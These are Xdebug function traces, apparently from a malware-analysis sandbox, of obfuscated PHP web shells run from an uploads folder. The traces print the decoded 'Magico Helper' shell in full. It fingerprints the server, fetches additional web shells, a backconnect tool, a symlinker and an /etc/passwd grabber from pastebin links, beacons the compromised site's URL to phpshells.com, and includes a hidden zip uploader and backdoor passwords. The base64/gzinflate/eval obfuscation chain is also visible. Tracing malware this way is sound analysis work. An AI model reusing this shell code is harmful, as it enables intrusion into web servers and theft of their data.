3	12	0	0.001064	403368	gzuncompress	0		/var/www/html/uploads/refo.php(4) : eval()'d code	1	1	'x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh��I��̶x9�'
3	12	1	0.001197	415688
3	12	R			'<html>\r\n<head>\r\n<meta content="text/html; charset=ISO-8859-1"\r\nhttp-equiv="content-type">\r\n<title>.:! Magico HelpeR | PhpShells.Com :.</title>\r\n</head>\r\n\r\n<body style="background-color: black; color: rgb(0, 0, 0);"\r\nalink="#ee0000" link="#0000ee" vlink="#551a8b">\r\n<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;"><span\r\nstyle="color: rgb(153, 153, 0);">.:!~@</span># </span><span\r\n\r\nstyle="color: red;'
3	13	0	0.001443	458704	eval	1	'?><html>\r\n<head>\r\n<meta content="text/html; charset=ISO-8859-1"\r\nhttp-equiv="content-type">\r\n<title>.:! Magico HelpeR | PhpShells.Com :.</title>\r\n</head>\r\n\r\n<body style="background-color: black; color: rgb(0, 0, 0);"\r\nalink="#ee0000" link="#0000ee" vlink="#551a8b">\r\n<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;"><span\r\nstyle="color: rgb(153, 153, 0);">.:!~@</span># </span><span\r\n\r\nstyle="color: red; font-weight: bold;"><a href="https://phpshells.com/"> Magico Helper </a></span><span\r\nstyle="font-weight: bold;"> </span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;">#<span\r\nstyle="color: rgb(153, 153, 0);">@~!:.</span></span><span\r\nstyle="color: white;"></span>\r\n<span style="font-weight: bold;"></span><br>\r\n<span style="font-weight: bold;"><img\r\nstyle="width: 300px; height: 150px;" alt=""\r\nsrc="https://phpshells.com/wp-content/themes/phpshells/images/logo.png"></span><br>\r\n<span style="font-weight: bold;"></span><small><span\r\nstyle="color: rgb(0, 153, 0);"><big><small><b>.: <span\r\nstyle="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>\r\n<small><span style="color: rgb(0, 153, 0);"><big>\r\n<small>---------------------------------------------------------------------------------------<br>\r\n<?php \r\nset_time_limit(0);\r\nerror_reporting(0);\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server Software   : </span></b>".$_SERVER[\'SERVER_SOFTWARE\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server Admin      : </span></b>".$_SERVER[\'SERVER_ADMIN\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> User              : </span></b>".get_current_user()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server IP         : </span></b>".$_SERVER[\'SERVER_ADDR\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Your IP           : </span></b>".$_SERVER["REMOTE_ADDR"]."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Uname             : </span></b>".php_uname()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Php version       : </span></b>".phpversion()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Dir               : </span></b>".getcwd()."<br>";\r\n////////////////////////////////////\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Safe Mode         : </span></b>";\r\n\tif(@ini_get(\'safe_mode\') or strtolower(@ini_get(\'safe_mode\')) == \'on\'){\r\n\t\techo "<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t\t\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>"; }\r\necho "<br>";\r\n//////////////////////////////////\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Curl                 :</span></b>";\r\n\tif(function_exists("curl_version")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Perl                 :</span></b>";\r\n\tif(function_exists("perl -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Python                 :</span></b>";\r\n\tif(function_exists("python -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Bash                 :</span></b>";\r\n\tif(function_exists("bash -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Mysql                 :</span></b>";\r\n\tif(function_exists("mysql_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Mssql                 :</span></b>";\r\n\tif(function_exists("mssql_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Oracle                 :</span></b>";\r\n\tif(function_exists("ocilogon")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Postgrase                 :</span></b>";\r\n\tif(function_exists("pg_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\n//////////////////////////////////\r\necho "<br><b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Disable_functions  : </span></b>";\r\n\r\n\t$disable_funs = @ini_get(\'disable_functions\');\r\n\t$arr = explode(\',\', $disable_funs);\r\n\tforeach($arr as $fun){\r\n\t\techo "<span style=\\"font-weight: bold; color: red;\\">$fun</span>"." - ";\r\n\t}\r\n\r\n\r\n/* or\r\n\t$funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");\r\n\t\tforeach($funs as $fun){\r\n\t\t\tif(!function_exists($fun)){\r\n\t\t\t\techo $fun." - ";\r\n\t\t\t}\r\n\t\t}*/\r\n//////////////////////////////\r\necho"<br>";\r\necho"---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";\r\necho\'<form method="post">\r\n<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Tools Grabber : <b></span><select name="tools" >\r\n<option>===================</option>\r\n<option>hidden uploader</option>\r\n<option>k2ll33d shell</option>\r\n<option>x shell</option>\r\n<option>2015priv8bypass</option>\r\n<option>fwso shell</option>\r\n<option>awso shell</option>\r\n<option>mass</option>\r\n<option>/etc/passwd</option>\r\n<option>server users</option>\r\n<option>backconnect weevely</option>\r\n<option>turbo cpanel</option>\r\n<option>symlinker</option>\r\n<option>adminer</option>\r\n<option>mailer</option>\r\n<option>Magico pws</option>\r\n<option>safe mode</option>\r\n<option>404 shell</option>\r\n<option>wp mass info changer</option>\r\n<option>jo mass info changer</option>\r\n\r\n</select>\r\n<input type="submit" name="get" value="Get" />\r\n</form>\';\r\n/////////////////////////////////////////////////////////////////\r\nif(isset($_POST[\'get\'])){\r\n\tswitch($_POST[\'tools\']){\r\n\t\r\n\t\tcase "x shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=vYzbTTs8\',\'oop.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "2015priv8bypass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5CRWPuPN\',\'r00t.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "hidden uploader":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=cf8nikzF\',\'upx.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "awso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0USmsjpW\',\'awso.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=dWAksQgN\',\'mass.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "/etc/passwd":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=KbwUY0aR\',\'passwd.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "k2ll33d shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=8mwwA4V2\',\'k.php\');\r\n\t\tbreak;\t\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "fwso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=f2VWCsNY\',\'fwso.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "adminer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=BZHXtZqu\',\'adminer.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "backconnect weevely":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=6YkfqzQ1\',\'bc.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "turbo cpanel":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=svbEfUPF\',\'turbo.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "symlinker":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zQFua4Z\',\'symv4.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "server users":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5VKD1nEk\',\'users.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mailer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zzgByV6\',\'wp-mailer.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "Magico pws":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=r2mpC2tL\',\'pws.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "safe mode":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=Te1e1uhA\',\'php.ini\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "404 shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0c3TeKDu\',\'404.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "wp mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=uNqDPzjR\',\'wp-masser.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "jo mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=gvEdgkyK\',\'jo-masser.php\');\r\n\t\tbreak;\r\n\t\t\t\t\r\n\t\r\n\t\t} // switch end\r\n}// end if\r\n////////////////////////////////////////////////////////////////\r\n// by INJECTOR_MA\r\nfunction phpshells($input,$output){\r\n\t@mkdir(\'phpshells\');\r\n\t@chdir(\'./phpshells\');\r\n\t\r\n\tif(!file_exists($output)){\r\n\t\t\r\n\t$cn = @file_get_contents($input);\r\n\t$save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);\r\n\treturn "<br>[#]DoNe: <a href=\\"./phpshells/$output\\"> Go to Here </a>";\r\n\t}else{ return "<br>[#] Allready Here : <a href=\\"./phpshells/$output\\"> Go to Here </a>"; }\r\n\t\r\n}\t\t\t\t\r\n///////////////////////////////////////////////////////////////\r\n\r\n?>\r\n\r\n<br><br><br><br>\r\n<span style="color: rgb(0, 153, 0);">[#]</span> <span\r\nstyle="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span\r\nstyle="color: rgb(153, 51, 153);">Please\r\nNotice</span> :</span> the password of the <span\r\nstyle="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span\r\nstyle="color: rgb(153, 153, 0);">123456</span></span>\r\n<br>\r\n<span\r\nstyle="color: rgb(0, 153, 0);">[#] the user of [<span\r\nstyle="color: rgb(51, 204, 0);"> fwso shell</span>\r\n] is <span style="color: rgb(153, 153, 0);">magico</span> and the\r\npassword is <span style="color: rgb(153, 153, 0);">xmagico</span></span>\r\n<span style="color: rgb(0, 153, 0);"></span>\r\n<br>\r\n<span style="color: rgb(0, 153, 0);">[#] to view <span\r\nstyle="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span\r\nstyle="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>\r\n<span style="color: rgb(0, 153, 0);">[#] The Pass of <span\r\nstyle="color: rgb(51, 204, 0);">404 shell</span> is</span><span\r\nstyle="color: rgb(255, 204, 51);"> <span\r\nstyle="color: rgb(204, 153, 51);">katibprv8</span></span>\r\n<br><b>...::::::: PhpShells.Com ::::::::...</b>\r\n\r\n</big></span></body></html>\r\n\r\n<?php\r\necho \'<link rel="stylesheet" type="text/css" href="\'.base64_decode("aHR0cHM6Ly9waHBzaGVsbHMuY29tL2hpZGUvYWRkLnBocD9saW5rPWVhc3ljb2RlcjovLw==").$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'].\'">\';?>\r\n\r\n<?php\r\nif(isset($_GET["katib"])){\r\n  echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\n  echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';\r\n  if( $_POST[\'_upl\'] == "Upload" ) {\r\n  $file = $_FILES[\'file\'][\'name\'];\r\n  if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {\r\n  $zip = new ZipArchive;\r\n  if ($zip->open($file) === TRUE) {\r\n     $zip->extractTo(\'./\');\r\n     $zip->close();\r\n  echo \'Yükleme Başarılı\';\r\n  } else {\r\n  echo \'Yüklenmedi.\';\r\n  }\r\n  }else{\r\n  echo \'<b>Basarisiz</b><br><br>\';\r\n  }\r\n  }\r\n}\r\n?>'	/var/www/html/uploads/refo.php(4) : eval()'d code	1	0
4	14	0	0.001672	458704	set_time_limit	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	29	1	0
4	14	1	0.001691	458768
4	14	R			FALSE
4	15	0	0.001706	458736	error_reporting	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	30	1	0
4	15	1	0.001721	458776
4	15	R			22527
4	16	0	0.001736	458736	get_current_user	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	33	0
4	16	1	0.001775	458776
4	16	R			'osboxes'
4	17	0	0.001792	458744	php_uname	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	36	0
4	17	1	0.001807	458856
4	17	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	18	0	0.001826	458744	phpversion	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	37	0
4	18	1	0.001839	458808
4	18	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4	19	0	0.001855	458744	getcwd	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	38	0
4	19	1	0.001869	458792
4	19	R			'/var/www/html/uploads'
4	20	0	0.001885	458744	ini_get	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	41	1	'safe_mode'
4	20	1	0.001899	458776
4	20	R			FALSE
4	21	0	0.001912	458744	ini_get	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	41	1	'safe_mode'
4	21	1	0.001926	458776
4	21	R			FALSE
4	22	0	0.001939	458744	strtolower	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	41	1	FALSE
4	22	1	0.001952	458776
4	22	R			''
4	23	0	0.001966	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	48	1	'curl_version'
4	23	1	0.001981	458784
4	23	R			TRUE
4	24	0	0.001994	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	53	1	'perl -h'
4	24	1	0.002008	458784
4	24	R			FALSE
4	25	0	0.002021	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	58	1	'python -h'
4	25	1	0.002035	458784
4	25	R			FALSE
4	26	0	0.002048	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	63	1	'bash -h'
4	26	1	0.002062	458784
4	26	R			FALSE
4	27	0	0.002075	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	68	1	'mysql_connect'
4	27	1	0.002089	458784
4	27	R			FALSE
4	28	0	0.002101	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	73	1	'mssql_connect'
4	28	1	0.002115	458784
4	28	R			FALSE
4	29	0	0.002127	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	78	1	'ocilogon'
4	29	1	0.002145	458784
4	29	R			FALSE
4	30	0	0.002157	458744	function_exists	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	83	1	'pg_connect'
4	30	1	0.002179	458784
4	30	R			FALSE
4	31	0	0.002192	458744	ini_get	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	90	1	'disable_functions'
4	31	1	0.002207	459224
4	31	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3		A						/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	90	$disable_funs = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4	32	0	0.002254	459192	explode	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	91	2	','	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4	32	1	0.002278	461664
4	32	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
3		A						/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	91	$arr = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
4	33	0	0.002357	461704	base64_decode	0		/var/www/html/uploads/refo.php(4) : eval()'d code(1) : eval()'d code	261	1	'aHR0cHM6Ly9waHBzaGVsbHMuY29tL2hpZGUvYWRkLnBocD9saW5rPWVhc3ljb2RlcjovLw=='
4	33	1	0.002376	461848
4	33	R			'https://phpshells.com/hide/add.php?link=easycoder://'
3	13	1	0.002395	461704
2	7	1	0.002406	420288
			0.002429	339032
TRACE END   [2023-02-13 01:32:11.741731]


data/traces/f753e6b33671395ff702fc0302820895_trace-1676261080.1254.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:05:06.023198]
1	0	1	0.000161	393528
1	3	0	0.000232	398448	{main}	1		/var/www/html/uploads/magico.php	0	0
1		A						/var/www/html/uploads/magico.php	2	$UeXploiT = 'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA'
1		A						/var/www/html/uploads/magico.php	3	$An0n_3xPloiTeR = '=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh'
2	4	0	0.000296	398448	base64_decode	0		/var/www/html/uploads/magico.php	4	1	'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqeamcSnpCbnp6RqFJcUFaWWaag45hnkxRtXBOTkZ4akBmmCgTUA'
2	4	1	0.000316	398640
2	4	R			'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i�8�\031��\033W\004��g��\006i��5\000'
2	5	0	0.000341	398608	gzinflate	0		/var/www/html/uploads/magico.php	4	1	'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i�8�\031��\033W\004��g��\006i��5\000'
2	5	1	0.000366	398768
2	5	R			'eval(\'?&gt;\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	6	0	0.000385	398576	htmlspecialchars_decode	0		/var/www/html/uploads/magico.php	4	1	'eval(\'?&gt;\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	6	1	0.000404	398768
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'
2	7	0	0.000434	400320	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($An0n_3xPloiTeR))))));'	/var/www/html/uploads/magico.php	4	0
3	8	0	0.000451	400320	strrev	0		/var/www/html/uploads/magico.php(4) : eval()'d code	1	1	'=MYqtL4B/bP3HIaBc7jfRza9TEChfPFl7vCVBGKjiPC+NGx83wE2r7kP5PQ8C+wz0eY+9Hm//p/i+//0szY2L223nz/3rGSlNOIKUPD0E5HjdVNUDfu3C46QSeSdaIb76NpK1xqIEYDCKmbrLSi9iM8sMc9zv10nYwiD5Mw0HAasr4AJqHOJ10egEdU218SxaP3Fz5DKz4m7n5DDbvY1PO++GXu+20BKLLgwhkVLxMU9HOnOR2xZSklLElQNn5OTiTQK51KK7TuMJ+KLlNDAsxWoFo0CRI1+AyH33b5dZYp4R5UGLx+XReSo1HDFc0Pjz1YAn6UYcj4HoSPwt6A3UpZAElDnRTpVcZXxONlI6GZIcwNyqykItqf1HOnUGWYYb3s5KR5ZejR7lZc9XsqLfq61e3QuWlg3pbdExVeZltsd+Yn67vUNrrqvwu9Qrs+88fpXce9g1eX2R3fr11szLP85evhr+4wvs6tE0pHuv+AQ/TredddvPuayRrtiV7Rh'
3	8	1	0.000479	404448
3	8	R			'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2'
3	9	0	0.000507	404416	base64_decode	0		/var/www/html/uploads/magico.php(4) : eval()'d code	1	1	'AeAKH/UB2wok9Xic3VrrUttKEv4NVbzDRKHK5iy+cHGKEOwAwQE24RJjYAmhXCNpbCnWLRrJxmRzXmWf4fzff3v2vbZ7RvINORjZpyq1qgRLmp7ur3t6ZnpavWMEtlVZWtwxGNXx12YBJZrrBMwJykrA7oMCkrwhmkF9zoLy8cVZbmur9Dq3piwtGkHg5di30OyUlahTLuh5TEFWgRlYrJLffkFOaMvUXHLELI/VyD/JueFdGMyyeP6da5Pt/E5B0kKnQgQEblVX7xEe9CxWVlSqtVu+Gzp6TnMt198mqgWvAJZ88ltqtrhK8N/KGwBGLdNpl5WXjBXhUkj0iA+MKaQTPZdKa3RLFWh1sxMLQ61zwKHlbBOLNYM3SmWHe9SJ20dlrpU2pNTKTgGpJO3S4mPi0toqWS9uCmrSBHPlusxsGQEo41p6LCWpp5AxEAQ2/X03kvaSjIp91J3pE4RRYvisWVZwEPl2oeAZHpejorl2QamMDJsPYmiyhknMycy2'
3	9	1	0.000542	408544
